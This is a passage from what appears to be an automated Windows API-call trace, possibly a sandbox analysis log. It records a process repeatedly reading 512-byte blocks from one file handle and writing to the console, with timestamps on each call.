_get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] GetFileType (hFile=0x50) returned 0x1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.753] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0227.754] GetFileType (hFile=0x50) returned 0x1 [0227.754] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.754] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.754] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.754] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.754] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.754] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.754] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.754] GetFileType (hFile=0x50) returned 0x1 [0227.754] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.754] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.754] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: 
lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.755] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.756] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, 
lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile 
(in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 
[0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, 
lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, 
lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: 
lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, 
